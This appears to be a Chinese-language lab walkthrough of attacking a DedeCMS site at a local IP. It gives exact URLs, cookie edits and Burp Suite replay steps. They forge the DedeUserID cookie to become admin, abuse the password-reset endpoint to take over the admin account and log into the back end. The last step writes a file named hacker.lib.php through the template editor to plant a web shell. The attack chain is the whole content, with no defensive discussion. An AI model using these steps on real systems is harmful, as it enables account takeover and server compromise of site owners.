首先，访问dedecms前台登入

这个需要账号和密码才能登入，所以去注册一个新的用户，去访问http://10.10.10.140/member/index_do.php?fmdo=user&dopost=regnew

完成个人信息的填写，用户名为0000001，登入密码为123456，安全问题不需要填写，点击完善信息，即完成注册

回到http://10.10.10.140/member/，登入刚才注册的账号

登入成功后，访问http://10.10.10.140/member/index.php?uid=0000001，即个人空间的访问

打开F12，选择应用程序，点击Cookie，修改DedeUserID为用户名0000001，将last_vid__ckMd5的值赋给DedeUserID__ckMd5，

之后再次访问http://10.10.10.140/member/，此时账户将从0000001账户变到admin账户

这时，打开bp代理抓包，访问http://10.10.10.140/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1

然后全选，右键选择Send to Repeater，之后确保修改的DedeUserID为用户名0000001和last_vid__ckMd5的值赋给DedeUserID__ckMd5的值和之前的一样，点击send

注意http://127.0.0.1/member/resetpassword.php?dopost=getpasswd&id=1&key=gsLLKe0M，将url的127.0.0.1改为10.10.10.140，并删去两个amp;

即为http://10.10.10.140/member/resetpassword.php?dopost=getpasswd&id=1&key=gsLLKe0M，关掉bp代理并访问

此时就能修改前端admin账号的密码，修改密码为123，点击下一步，修改admin密码完成

选择系统设置->个人资料->基本资料

注意填写的昵称为admin，原登入密码为刚才修改的admin密码为123，新密码为1234，再次打开bp代理，点击更新，抓到包之后还是选择Send to Repeater

步骤同上，确保修改的DedeUserID为用户名0000001和last_vid__ckMd5的值赋给DedeUserID__ckMd5的值和之前的一样，点击send

右边选择Render，查看是否基本资料已经修改完成，如上图，关掉bp代理，访问后台http://10.10.10.140/dede/login.php?gotopage=%2Fdede%2F

这里登入admin的用户名和密码，密码是刚才修改的1234，登入dedecms后台

访问http://10.10.10.140/dede/tpl.php?action=upload

这里就能上传木马文件到dedecms后台，进行shell，或者按F12查看源代码

拿取token为4cd0250ffecf03b6ceca6b739944b4f6

构造payload

http://10.10.10.140/dede/tpl.php?

filename=hacker.lib.php&action=savetagfile&content=&token=4cd0250ffecf03b6ceca6b739944b4f6，访问

这里可以进行shell，位置是include/taglib/hacker.lib.php，至此dedecms前台任意用户密码修改完成